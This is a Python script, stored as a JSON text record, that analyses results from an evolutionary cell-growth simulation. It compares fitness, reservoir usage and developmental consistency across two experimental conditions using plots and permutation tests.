+{"seq_id":"42968150391","text":"from copy import deepcopy\nimport os\nfrom types import TracebackType\nimport numpy as np\nfrom PIL.Image import SAVE\nfrom numpy.core.fromnumeric import std\nfrom numpy.lib.index_tricks import s_\nfrom scipy.fft import ihfft\nfrom scipy.stats.stats import trim_mean\nimport cell \nimport globalVars as globs\nimport fitness as fit\nimport evolution as ev\nimport board as brd\nimport hyperParameters as hp\nimport genome\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport seaborn as sns\nfrom matplotlib.colors import ListedColormap\nimport fitness\nimport os\nfrom scipy.stats import ttest_ind\nimport pandas as pd \nfrom math import ceil\nfrom mlxtend.evaluate import permutation_test\n\n\n\nflatui = [ \"#FFFFFF\", \"#FFFFFF\", \"#000000\", \"#FF0000\", \"#00FF00\"]\nmy_cmap = ListedColormap(sns.color_palette(flatui).as_hex())\n\n\ntotalFitness = 150\nnumberOfSimulations = 100\ngraph_y_min = 0\ngraph_y_max = 70 + 2\nnumGenerations = 7500\nminThresholdForImages = 0\n\ntop_fitness_scores_1_first = []\ntop_fitness_scores_1_final = []\ntop_fitness_scores_2_first = []\ntop_fitness_scores_2_final = []\n\nFP1 = \"oct_10_control\"\nFP2 = \"oct_10_signals\"\n# SAVE_TO = \"comparing_\" + FP1 + \"__and__\" + FP2 + \"forcing_infinite\"\nSAVE_TO = \"comparing reservoir caps\"\nstd_devs_f1 = []\nstd_devs_f2 = []\n\npixel_similarities_f1 = []\npixel_similarities_f2 = []\n\ntotal_finite_hits = []\ntotal_infinite_hits = []\n\ntarget_size_scores = []\naspect_ratio_scores = []\nred_green_scores = []\n\nmetabolic_reservoir_caps = []\nmetabolic_reservoir_caps.append([])\n\n\n\ndef updateHyperParametersF1():\n hp.onlyInfinite = False\n hp.targetAspectRatio = 5\n hp.targetSize = 400\n hp.useConsistency = False\n hp.onlyFinite = False\n hp.useReservoirsAsInputs = False\n hp.onlyUseSizeAsFitness = False\n hp.useMidpointsForAspectRatio = True\n\ndef updateHyperParametersF2():\n hp.onlyInfinite = False\n hp.targetAspectRatio = 5\n hp.targetSize = 400\n hp.useConsistency = False\n hp.onlyFinite = False\n hp.useReservoirsAsInputs = False\n hp.onlyUseSizeAsFitness = False\n hp.useMidpointsForAspectRatio = True\n\ndef convertStringKeysToIntKeys(d):\n keys = list(d.keys()) \n for k in keys:\n d[int(k)] = d[k]\n d.pop(k, None)\n return d\n\n\ndef main():\n \n genomesInfo1 = []\n genomesInfo2 = []\n\n first_gen_1 = []\n final_gen_1 = []\n first_gen_2 = 
[]\n final_gen_2 = []\n\n\n # os.mkdir(SAVE_TO)\n # os.mkdir(SAVE_TO + \"/first_gen_pics_\" + FP1)\n # os.mkdir(SAVE_TO + \"/first_gen_pics_\" + FP2)\n # os.mkdir(SAVE_TO + \"/final_gen_pics_\" + FP1)\n # os.mkdir(SAVE_TO + \"/final_gen_pics_\" + FP2)\n # os.mkdir(SAVE_TO + \"/evolution_pics_\" + FP1)\n # os.mkdir(SAVE_TO + \"/evolution_pics_\" + FP2)\n\n updateHyperParametersF1()\n\n for s_idx in range(numberOfSimulations):\n # for s_idx in [59, 56, 96, 92]:\n # for s_idx in [20, 70, 85, 24]:\n # for s_idx in [0, 70, 6, 63]:\n # for s_idx in [95, 11, 29, 65]:\n # for s_idx in [1, 2, 3, 4, 5]:\n # for s_idx in [70]:\n FP = \"data/\" + FP1 + \"/r\" + str(s_idx) + \".json\"\n with open(FP, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo1 = data[\"genomes\"]\n\n first_gen_1.append(genomesInfo1[0][\"fitness\"])\n final_gen_1.append(genomesInfo1[-1][\"fitness\"])\n\n finiteHits = []\n infiniteHits = []\n for gen_idx, g in enumerate(genomesInfo1):\n fh = 0\n ih = 0\n for s in g[\"resHits\"]:\n fh += s[\"metFin\"]\n ih += s[\"infFin\"]\n \n try:\n total_finite_hits[gen_idx].append(fh)\n except:\n total_finite_hits.append([fh])\n\n try:\n total_infinite_hits[gen_idx].append(ih)\n except:\n total_infinite_hits.append([ih])\n\n\n try:\n target_size_scores[gen_idx].append(g[\"sizeFitness\"])\n except:\n target_size_scores.append([g[\"sizeFitness\"]])\n\n try:\n aspect_ratio_scores[gen_idx].append(g[\"aspectRatioFitness\"])\n except:\n aspect_ratio_scores.append([g[\"aspectRatioFitness\"]])\n\n try:\n red_green_scores[gen_idx].append(g[\"cellRatioFitness\"])\n except:\n red_green_scores.append([g[\"cellRatioFitness\"]])\n\n for i in range(numGenerations + 1):\n try:\n metabolic_reservoir_caps[i].append(genomesInfo1[i][\"metabolicReservoirValues\"][\"0\"])\n except:\n metabolic_reservoir_caps.append([genomesInfo1[i][\"metabolicReservoirValues\"][\"0\"]])\n\n # print(metabolic_reservoir_caps)\n \n # finiteHits.append(fh)\n # infiniteHits.append(ih)\n # ys_f = finiteHits\n # ys_i = infiniteHits\n\n \n\n g_final_1 = genome.Genome(genomesInfo1[-1][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo1[-1][\"metabolicReservoirValues\"]), \n genomesInfo1[-1][\"fitness\"], \n )\n\n \n g_first_1 = genome.Genome(genomesInfo1[0][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo1[0][\"metabolicReservoirValues\"]), \n genomesInfo1[0][\"fitness\"], \n )\n \n updateHyperParametersF2()\n FP = \"data/\" + FP2 + \"/r\" + str(s_idx) + \".json\"\n # print(FP)\n with open(FP, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo2 = data[\"genomes\"]\n\n first_gen_2.append(genomesInfo2[0][\"fitness\"])\n final_gen_2.append(genomesInfo2[-1][\"fitness\"])\n\n\n\n g_final_2 = genome.Genome(genomesInfo2[-1][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo2[-1][\"metabolicReservoirValues\"]), \n genomesInfo2[-1][\"fitness\"], \n )\n\n g_first_2 = genome.Genome(genomesInfo2[0][\"genome\"], \n convertStringKeysToIntKeys(genomesInfo2[0][\"metabolicReservoirValues\"]), \n genomesInfo2[0][\"fitness\"], \n )\n\n # ------------------\n # GRAPHS TO GENERATE \n # ------------------\n\n # Keep tabbed \n # generate_first_generation_pictures(g_first_1, FP1, s_idx, updateHyperParametersF1)\n # generate_first_generation_pictures(g_first_2, FP2, s_idx, updateHyperParametersF2)\n # generate_final_generation_pictures(g_final_1, FP1, s_idx, updateHyperParametersF1)\n # generate_final_generation_pictures(g_final_2, FP2, s_idx, updateHyperParametersF2)\n \n # consistency_difference(g_final_1, g_final_2, FP1, 
FP2, updateHyperParametersF1, updateHyperParametersF2, 5, s_idx)\n # pixel_similarity_helper(g_final_1, pixel_similarities_f1, updateHyperParametersF1, 30, s_idx)\n # pixel_similarity_helper(g_final_2, pixel_similarities_f2, updateHyperParametersF2, 30, s_idx)\n\n # if s_idx in [91]:\n # generate_pic_of_each_generation_in_evolution(genomesInfo1, FP1, s_idx, updateHyperParametersF1)\n # generate_pic_of_each_generation_in_evolution(genomesInfo2, FP2, s_idx, updateHyperParametersF2)\n\n # top_fitness_scores_1_final.append([g_final_1.totalFitness, s_idx])\n # top_fitness_scores_2_final = []\n # top_fitness_scores_2_final.append([g_final_2.totalFitness, s_idx])\n # top_fitness_scores_1_first.append([g_first_1.totalFitness, s_idx])\n # top_fitness_scores_2_first.append([g_first_2.totalFitness, s_idx])\n # individual_fitness_breakdown(s_idx)\n # individual_fitness_graph(s_idx, genomesInfo1)\n\n # finite_reservoir_capacity_over_time_individual(s_idx, genomesInfo1)\n \n \n\n # print(np.mean(pixel_similarities_f1))\n # print(np.mean(pixel_similarities_f2))\n # pixel_similarity_graph()\n # print_top_agent_numbers(top_fitness_scores_1_first, top_fitness_scores_2_first, \"first\")\n # print_top_agent_numbers(top_fitness_scores_1_final, top_fitness_scores_2_final, \"final\")\n\n avg_fitness_per_generation(FP1, FP1)\n avg_fitness_per_generation(FP2, FP2)\n # gen_csv_of_first_and_final_gen_scores(first_gen_1, final_gen_1, first_gen_2, final_gen_2)\n # threshold_passing([.8], FP1, FP2)\n # t_test(FP1, FP2, final_gen_1, final_gen_2)\n # compute_permutation_test(FP1, FP2, final_gen_1, final_gen_2)\n # consistency_difference_summary()\n # pixel_vs_fitness_similarity(std_devs_f1, pixel_similarities_f1, \"infinite_and_finite\")\n # pixel_vs_fitness_similarity(std_devs_f2, pixel_similarities_f2, \"infinite only\")\n # infinite_and_finite_reservoir_usage()\n # fitness_breakdown()\n # finite_reservoir_capacity_over_time()\n print(min(final_gen_1))\n print(max(final_gen_1))\n\n print(min(final_gen_2))\n print(max(final_gen_2))\n\n\ndef finite_reservoir_capacity_over_time_individual(s_idx, genomesInfo):\n\n ys = []\n for gi in genomesInfo:\n try:\n ys.append(gi[\"metabolicReservoirValues\"][0])\n except:\n ys.append(gi[\"metabolicReservoirValues\"][\"0\"])\n # print(gi[\"metabolicReservoirValues\"][0])\n\n # ys.append(gi[\"metabolicReservoirValues\"][0])\n\n xs = list(range(numGenerations + 1))\n fig = plt.figure()\n ax = plt.axes()\n # a_list = [np.mean(x) for x in total_finite_hits]\n # b_list = [np.mean(x) for x in total_infinite_hits]\n # c = [100 * (a / (a + b)) for a, b in zip(a_list, b_list)]\n # ax.plot(xs[:1000], c[:1000])\n \n # print(ys)\n \n\n # for i in range(numGenerations + 1):\n # ys.append(gi[i][\"metabolicReservoirValues\"])\n\n ax.plot(xs, ys)\n\n ax.set(xlabel='Generation Number', ylabel=\"Finite Reservoir Cap\", title=str(s_idx))\n ax.grid(True)\n # ax.legend([\"Finite\", \"Infinite\"])\n # ax.set_ylim([0, 100])\n plt.savefig(\"individual_reservoir_caps/\" + str(s_idx) + \".png\")\n # plt.show()\n plt.clf()\n\n\ndef finite_reservoir_capacity_over_time():\n xs = list(range(numGenerations + 1))\n fig = plt.figure()\n ax = plt.axes()\n # a_list = [np.mean(x) for x in total_finite_hits]\n # b_list = [np.mean(x) for x in total_infinite_hits]\n # c = [100 * (a / (a + b)) for a, b in zip(a_list, b_list)]\n # ax.plot(xs[:1000], c[:1000])\n ys = [np.mean(arr) for arr in metabolic_reservoir_caps[:numGenerations + 1]]\n ax.plot(xs, ys)\n\n ax.set(xlabel='Generation Number', ylabel=\"Finite Reservoir Cap\", 
title=\"fixed finite 5\")\n    ax.grid(True)\n    # ax.legend([\"Finite\", \"Infinite\"])\n    # ax.set_ylim([0, 100])\n    # plt.savefig(SAVE_TO + \"/Avg_Fitness__\" + FP + \".png\")\n    plt.show()\n    plt.clf()\n\ndef individual_fitness_graph(s_idx, gi):\n    xs = list(range(numGenerations + 1))\n    ys = []\n    for i in range(len(gi)):\n        ys.append(gi[i][\"fitness\"])\n    \n    ax = plt.gca()\n    ax.plot(xs, ys)\n    ax.set(xlabel='Generation Number', ylabel='Fitness Score', title=str(s_idx))\n    ax.grid(True)\n    ax.set_ylim([0, 152])\n    plt.savefig(\"individual_fitnesses/r\" + str(s_idx) + \".png\")\n    plt.clf()\n    # plt.show()\n\ndef individual_fitness_breakdown(s_idx):\n    xs = list(range(numGenerations + 1))\n    ys1 = []\n    ys2 = []\n    ys3 = []\n    for k in range(len(target_size_scores)):\n        ys1.append(target_size_scores[k][s_idx])\n        ys2.append(aspect_ratio_scores[k][s_idx])\n        ys3.append(red_green_scores[k][s_idx])\n    \n    ax = plt.gca()\n    ax.plot(xs, ys1)\n    ax.plot(xs, ys2)\n    ax.plot(xs, ys3)\n    ax.set(xlabel='Generation Number', ylabel='Fitness Subscore', title=\"Individual Fitness Breakdown During Evolution\")\n    ax.grid(True)\n    ax.set_ylim([0, 52])\n    ax.legend([\"Target Size\", \"Aspect Ratio\", \"Red Green Split\"])\n    plt.savefig(\"fitness_breakdowns/r\" + str(s_idx) + \".png\")\n    plt.clf()\n    # plt.show()\n\ndef fitness_breakdown():\n    xs = list(range(numGenerations + 1))\n    ys1 = []\n    ys2 = []\n    ys3 = []\n    for k in range(len(target_size_scores)):\n        ys1.append(np.mean(target_size_scores[k]))\n        ys2.append(np.mean(aspect_ratio_scores[k]))\n        ys3.append(np.mean(red_green_scores[k]))\n\n    ax = plt.gca()\n    ax.plot(xs, ys1)\n    ax.plot(xs, ys2)\n    ax.plot(xs, ys3)\n    ax.set(xlabel='Generation Number', ylabel='Fitness Subscore', title=\"Average Fitness Breakdown During Evolution\")\n    ax.grid(True)\n    ax.set_ylim([0, 52])\n    ax.legend([\"Target Size\", \"Aspect Ratio\", \"Red Green Split\"])\n    # plt.savefig(SAVE_TO + \"/Avg_Fitness_smooshed.png\")\n    # plt.clf()\n    plt.show()\n\ndef infinite_and_finite_reservoir_usage():\n    xs = list(range(numGenerations + 1))\n    fig = plt.figure()\n    ax = plt.axes()\n    a_list = [np.mean(x) for x in total_finite_hits]\n    b_list = [np.mean(x) for x in total_infinite_hits]\n\n    p_value = permutation_test(a_list, b_list,\n                            method='approximate',\n                            num_rounds=100000,\n                            seed=0)\n    print(\"infinite_and_finite_reservoir_usage p-value = \", p_value)\n\n    # per-simulation finite-usage percentages at the first and final generation\n    start_pct = [100 * (a / (a + b)) for a, b in zip(total_finite_hits[0], total_infinite_hits[0])]\n    end_pct = [100 * (a / (a + b)) for a, b in zip(total_finite_hits[numGenerations], total_infinite_hits[numGenerations])]\n\n    x = [\"Start Of Development\"] * numberOfSimulations + [\"End Of Development\"] * numberOfSimulations\n    y = start_pct + end_pct\n    print(x)\n    print(y)\n    sns.set(style='ticks', context='talk')\n    df= pd.DataFrame({'x': x, 'y': y})\n\n    sns.swarmplot('x', 'y', data=df)\n    sns.despine()\n    \n    plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n    plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n    # plt.title(\"Simulations Using Only Infinite Reservoirs Take Longer to Reach \" + str(threshold) + \" Percent of Max Fitness\")\n    plt.title(\"title\")\n    plt.ylabel(\"Remaining Finite Fuel\")\n    # plt.savefig(SAVE_TO + \"/\" + \"threshold_\" + str(threshold) + \".png\")\n    plt.show()\n    plt.clf()\n\n    # ax.set(xlabel='Generation Number', ylabel=\"% FiniteUsage\", title=\"title\")\n    # ax.grid(True)\n    # # ax.legend([\"Finite\", \"Infinite\"])\n    # # ax.set_ylim([0, 100])\n    # # plt.savefig(SAVE_TO + \"/Avg_Fitness__\" + FP + \".png\")\n    # plt.show()\n    # plt.clf()\n\ndef print_top_agent_numbers(top_fitness_scores_1, top_fitness_scores_2, x):\n    top_fitness_scores_1.sort()\n    
top_fitness_scores_2.sort()\n print(x, top_fitness_scores_1[49:52])\n print(x, top_fitness_scores_2[49:52])\n\ndef avg_fitness_per_generation(FP, graph_title):\n fitnesses = []\n\n for s_idx in range(numberOfSimulations):\n file = \"data/\" + FP + \"/r\" + str(s_idx) + \".json\"\n with open(file, \"r\") as json_file:\n data = json.load(json_file)\n genomesInfo = data[\"genomes\"]\n\n for i in range(len(genomesInfo)):\n score = genomesInfo[i][\"fitness\"]\n \n try:\n fitnesses[i].append(score)\n except:\n fitnesses.append([score])\n \n xs = list(range(numGenerations + 1))\n ys = []\n for k in range(len(fitnesses)):\n ys.append(np.mean(fitnesses[k]))\n # ys.append(max(fitnesses[k]))\n \n print(\"min: \", min(ys))\n print(\"max: \", max(ys))\n\n fig = plt.figure()\n ax = plt.axes()\n ax.plot(xs, ys[:numGenerations + 1])\n ax.set(xlabel='Generation Number', ylabel='Average of Top Fitnesses of 100 Simulations', title=graph_title)\n ax.grid(True)\n ax.set_ylim([80, 150])\n # plt.savefig(SAVE_TO + \"/Avg_Fitness__\" + FP + \".png\")\n plt.show()\n plt.clf()\n\ndef gen_csv_of_first_and_final_gen_scores(first_gen_1, final_gen_1, first_gen_2, final_gen_2):\n df = pd.DataFrame({\n FP1 + \"_first_generation\": first_gen_1,\n FP1 + \"final_generation\": final_gen_1,\n FP2 + \"first_generation\": first_gen_2,\n FP2 + \"final_generation\": final_gen_2,\n })\n\n df.to_csv(SAVE_TO + \"/csv_of_first_and_final_gen_scores.csv\", index=False)\n\ndef generate_first_generation_pictures(g, FP, s_idx, update_params):\n update_params()\n \n board = brd.Board(hp.boardWidth, hp.boardHeight)\n score = 0\n\n # while score < minThresholdForImages:\n board.reset(g)\n g.fillReservoirs()\n while (len(board.dynamicCells)):\n board.step()\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n \n plt.title(\"r\" + str(s_idx))\n fitness_breakdown_string = \"total fitness: \" + str(round(score)) + \"/ 150\\nhead vs. tail fitness: \" + str(round(f.cellRatioScore)) + \" / 50 \\naspect ratio fitness: \" + str(round(f.aspectRatioScore)) + \" / 50 \\nsize fitness: \" + str(round(f.sizeScore)) + \" / 50\" \n plt.annotate(fitness_breakdown_string, \n (20, 8), # these are the coordinates to position the label\n color='blue')\n plt.savefig(SAVE_TO + \"/first_gen_pics_\" + FP + \"/r\" + str(s_idx) + \".png\")\n plt.clf()\n\ndef generate_final_generation_pictures(g, FP, s_idx, update_params):\n update_params()\n \n board = brd.Board(hp.boardWidth, hp.boardHeight)\n score = 0\n\n # while score < minThresholdForImages:\n board.reset(g)\n g.fillReservoirs()\n while (len(board.dynamicCells)):\n board.step()\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n \n plt.title(\"r\" + str(s_idx))\n fitness_breakdown_string = \"total fitness: \" + str(round(score)) + \"/ 150\\nhead vs. 
tail fitness: \" + str(round(f.cellRatioScore)) + \" / 50 \\naspect ratio fitness: \" + str(round(f.aspectRatioScore)) + \" / 50 \\nsize fitness: \" + str(round(f.sizeScore)) + \" / 50\"\n    # plt.annotate(fitness_breakdown_string, \n    #         (20, 8), # these are the coordinates to position the label\n    #         color='blue')\n    plt.savefig(SAVE_TO + \"/final_gen_pics_\" + FP + \"/r\" + str(s_idx) + \".png\")\n    plt.clf()\n\ndef generate_pic_of_each_generation_in_evolution(genomesInfo, FP, s_idx, update_params):\n    update_params()\n\n    os.mkdir(SAVE_TO + \"/evolution_pics_\" + FP +\"/r\" + str(s_idx))\n\n    board = brd.Board(hp.boardWidth, hp.boardHeight)\n    \n    genomes = []\n    for gi in genomesInfo:\n        genomes.append( \n            genome.Genome(gi[\"genome\"], \n                convertStringKeysToIntKeys(gi[\"metabolicReservoirValues\"]), \n                gi[\"fitness\"], \n            )\n        )\n\n    # for i in range(0, len(genomes)):\n    for i in [0, 100, 500, 2500, 5000, 7499]:\n        genomeToLookAt = genomes[i]\n        genomeToLookAt.fillReservoirs()\n        board.reset(genomeToLookAt)\n        while (len(board.dynamicCells)):\n            board.step()\n\n        data = np.array(board.grid)\n\n        rows,cols = data.shape\n\n        f = fitness.Fitness(board)\n        f.calculate()\n        score = f.totalScore\n\n        plt.imshow(data, interpolation='none', \n                        extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n                        aspect=\"equal\",\n                        cmap=my_cmap)\n\n\n        fitness_breakdown_string = \"total fitness: \" + str(score) + \"/ 150\\nhead vs. tail fitness: \" + str(f.cellRatioScore) + \" / 50 \\naspect ratio fitness: \" + str(f.aspectRatioScore) + \" / 50 \\nsize fitness: \" + str(f.sizeScore) + \" / 50\"\n        plt.annotate(fitness_breakdown_string, \n            (40, 8), # these are the coordinates to position the label\n            color='blue')\n\n        plt.title(\"Generation \" + str(i))\n\n        plt.show()\n        # plt.savefig(SAVE_TO + \"/evolution_pics_\" + FP +\"/r\" + str(s_idx) + \"/\" + str(i) + '.png')\n        plt.clf()\n\ndef threshold_passing(thresholds, FP1, FP2):\n    for threshold in thresholds:\n        ys_a = []\n        ys_b = []\n\n        for s_idx in range(numberOfSimulations):\n            FP = \"data/\" + FP1 + \"/r\" + str(s_idx) + \".json\"\n            with open(FP, \"r\") as json_file:\n                data = json.load(json_file)\n                genomesInfo = data[\"genomes\"]\n            \n            for i, gi in enumerate(genomesInfo):\n                if len(ys_a) == s_idx:\n                    if gi[\"fitness\"] > totalFitness * threshold:\n                        ys_a.append(i)\n            \n            \n            if len(ys_a) == s_idx:\n                ys_a.append(numGenerations)\n        \n        for s_idx in range(numberOfSimulations):\n            FP = \"data/\" + FP2 + \"/r\" + str(s_idx) + \".json\"\n            with open(FP, \"r\") as json_file:\n                data = json.load(json_file)\n                genomesInfo = data[\"genomes\"]\n            \n            for i, gi in enumerate(genomesInfo):\n                if len(ys_b) == s_idx:\n                    if gi[\"fitness\"] > totalFitness * threshold:\n                        ys_b.append(i)\n            \n            \n            if len(ys_b) == s_idx:\n                ys_b.append(numGenerations)\n\n\n        p_value = permutation_test(ys_a, ys_b,\n                                method='approximate',\n                                num_rounds=100000,\n                                seed=0)\n        # f.write(str(p_value))\n        # f.close()\n        print(\"threshold compute_permutation_test, \", str(FP1), str(FP2), str(p_value))\n        \n\n        # x = [FP1] * numberOfSimulations + [FP2] * numberOfSimulations\n        x = [\"Infinite Or Finite\"] * numberOfSimulations + [\"Infinite Only\"] * numberOfSimulations\n        y = ys_a + ys_b\n        sns.set(style='ticks', context='talk')\n        df= pd.DataFrame({'x': x, 'y': y})\n\n        sns.swarmplot('x', 'y', data=df)\n        sns.despine()\n        \n        plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n        plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n        # plt.title(\"Simulations Using Only Infinite Reservoirs Take Longer to Reach \" + str(threshold) + \" Percent of Max 
Fitness\")\n plt.title(\"Generations that Passed \" + str(threshold * 100) + \"%\" + \" of Max Fitness\")\n plt.ylabel(\"Generation\")\n plt.savefig(SAVE_TO + \"/\" + \"threshold_\" + str(threshold) + \".png\")\n plt.clf()\n\ndef consistency_difference(g1, g2, FP1, FP2, update_params_1, update_params_2, repeats, s_idx):\n \n # os.mkdir(\"new_repeats/inf_or_fin_\" + str(s_idx))\n # os.mkdir(\"new_repeats/inf_only_\" + str(s_idx))\n\n board = brd.Board(hp.boardWidth, hp.boardHeight)\n score = 0\n \n ys_a = []\n ys_b = []\n\n update_params_1()\n\n for i in range(repeats):\n board.reset(g1)\n g1.fillReservoirs()\n while (len(board.dynamicCells)):\n board.step()\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n # plt.show()\n \n # plt.savefig(\"new_repeats/inf_or_fin_\" + str(s_idx) + \"/\" + str(i) + '.png')\n plt.clf()\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n ys_a.append(score)\n\n update_params_2()\n\n for i in range(repeats):\n board.reset(g2)\n g2.fillReservoirs()\n step = 0\n while (len(board.dynamicCells)):\n board.step()\n\n data = np.array(board.grid)\n\n rows,cols = data.shape\n\n plt.imshow(data, interpolation='none', \n extent=[0.5, 0.5+cols, 0.5, 0.5+rows], \n aspect=\"equal\",\n cmap=my_cmap)\n # plt.show()\n # plt.savefig(\"new_repeats/inf_only_\" + str(s_idx) + \"/\" + str(i) + \"_step_\" + str(step) + '.png')\n # plt.savefig(\"new_repeats/inf_only_\" + str(s_idx) + \"/\" + str(i) + '.png')\n plt.clf()\n # step += 1\n\n f = fitness.Fitness(board=board)\n f.calculate()\n score = f.totalScore\n ys_b.append(score)\n\n x = [FP1] * repeats + [FP2] * repeats\n y = ys_a + ys_b\n sns.set(style='ticks', context='talk')\n # df= pd.DataFrame({'x': x, 'y': y})\n\n # sns.swarmplot('x', 'y', data=df)\n # sns.despine()\n\n std_devs_f1.append(np.std(ys_a))\n std_devs_f2.append(np.std(ys_b))\n\n std_dev_string = FP1 + \" std dev: \" + str(np.std(ys_a)) + \"\\n\" + FP2 + \" std dev: \" + str(np.std(ys_b))\n # plt.annotate(std_dev_string, \n # (50, 50), # these are the coordinates to position the label\n # color='blue')\n \n # plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n # plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n # plt.title(\"Repeat for r\" + str(s_idx) + \"\\n\" + std_dev_string)\n\n \n # plt.ylabel(\"Fitness Score\")\n \n # plt.text(3+0.2, 4.5, \"An annotation\", horizontalalignment='left', size='medium', color='black', weight='semibold')\n # plt.savefig(SAVE_TO + \"/\" + \"repeats_r\" + str(s_idx) + \".png\")\n plt.clf()\n\n\n\ndef t_test(FP1, FP2, final_gen_1, final_gen_2):\n f = open(SAVE_TO + \"/t_test___\" + FP1 + \"___\" + FP2 + \".txt\", \"w\")\n f.write(str(ttest_ind(final_gen_1, final_gen_2)))\n f.close()\n\ndef compute_permutation_test(FP1, FP2, final_gen_1, final_gen_2):\n # f = open(SAVE_TO + \"/permutation_test___\" + FP1 + \"___\" + FP2 + \".txt\", \"w\")\n p_value = permutation_test(final_gen_1, final_gen_2,\n method='approximate',\n num_rounds=100000,\n seed=0)\n # f.write(str(p_value))\n # f.close()\n print(\"compute_permutation_test, \", str(FP1), str(FP2), str(p_value))\n\ndef consistency_difference_summary():\n plt.rcParams[\"figure.figsize\"] = [2.00, 3.50]\n # plt.rcParams[\"figure.autolayout\"] = True\n y_f = std_devs_f1\n y_l = std_devs_f2\n\n p_value = permutation_test(std_devs_f1, std_devs_f2,\n method='approximate',\n 
num_rounds=100000,\n seed=0)\n\n print(\"consistency difference p-value = \", p_value)\n\n x = [\"Infinite or Finite\"] * numberOfSimulations + [\"Infinite Only\"] * numberOfSimulations\n # print(x)\n y = y_f + y_l\n # print(y)\n sns.set(style='ticks', context='talk')\n df= pd.DataFrame({'x': x, 'y': y})\n\n sns.swarmplot('x', 'y', data=df)\n sns.despine()\n\n plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n plt.title(\"Finite Reservoirs Enable Consistent Growth\")\n plt.ylabel(\"Std Dev. of Fitness Over 30 Repeats\")\n # plt.savefig(SAVE_TO + \"/\" + \"consistency_summary.png\")\n plt.show()\n \n\ndef pixel_similarity_helper(g, total_scores, update_params, num_repeats, s_idx):\n boards = []\n\n update_params()\n b = brd.Board(hp.boardWidth, hp.boardHeight)\n\n for _ in range(num_repeats):\n b.reset(g)\n g.fillReservoirs()\n while (len(b.dynamicCells)):\n b.step()\n\n boards.append(deepcopy(b))\n\n spot_percentages = []\n for row in range(len(boards[0].grid)):\n for col in range(len(boards[0].grid[0])):\n white = 0\n black = 0\n green = 0\n red = 0\n for board in boards:\n cell = board.grid[row][col]\n if cell == 0:\n white += 1\n elif cell == globs.STEM:\n black += 1\n elif cell == globs.NERVE:\n green += 1\n elif cell == globs.SKIN:\n red += 1\n \n # if white == 30:\n # continue\n \n top_count = max(white, black, red, green)\n spot_percentages.append(top_count / num_repeats)\n \n # total_scores.append(np.mean(spot_percentages))\n total_scores.append(np.std(spot_percentages))\n\n \n \ndef pixel_similarity_graph():\n plt.rcParams[\"figure.figsize\"] = [2.00, 3.50]\n # plt.rcParams[\"figure.autolayout\"] = True\n y_f = pixel_similarities_f1\n y_l = pixel_similarities_f2\n\n x = [\"Infinite or Finite\"] * numberOfSimulations + [\"Infinite Only\"] * numberOfSimulations\n y = y_f + y_l\n sns.set(style='ticks', context='talk')\n df= pd.DataFrame({'x': x, 'y': y})\n\n sns.swarmplot('x', 'y', data=df)\n sns.despine()\n\n plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n plt.title(\"Consistency, comparing pixels\")\n plt.ylabel(\"Pixel similarity percentage\")\n # plt.savefig(SAVE_TO + \"/\" + \"consistency_summary.png\")\n plt.show()\n\n\n\ndef pixel_vs_fitness_similarity(fitness_stds, pixels_stds, title):\n plt.rcParams[\"figure.figsize\"] = [2.00, 3.50]\n # plt.rcParams[\"figure.autolayout\"] = True\n # y_f = pixel_similarities_f1\n # y_l = pixel_similarities_f2\n\n x = fitness_stds\n y = pixels_stds\n\n\n print(str(title), \", Pearson product-moment correlation coefficient: \", np.corrcoef(x, y))\n # sns.set(style='ticks', context='talk')\n # df= pd.DataFrame({'x': x, 'y': y})\n\n # sns.swarmplot('x', 'y', data=df)\n # sns.despine()\n\n plt.scatter(x, y)\n # plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n # plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n plt.plot(np.unique(x), np.poly1d(np.polyfit(x, y, 1))(np.unique(x)))\n plt.title(\"pixel_vs_fitness_similarity: \" + str(title))\n plt.xlabel(\"Fitness Similarity\")\n plt.ylabel(\"Pixel Similarity\")\n # plt.savefig(SAVE_TO + \"/\" + \"consistency_summary.png\")\n plt.show()\n\nif __name__ == \"__main__\":\n 
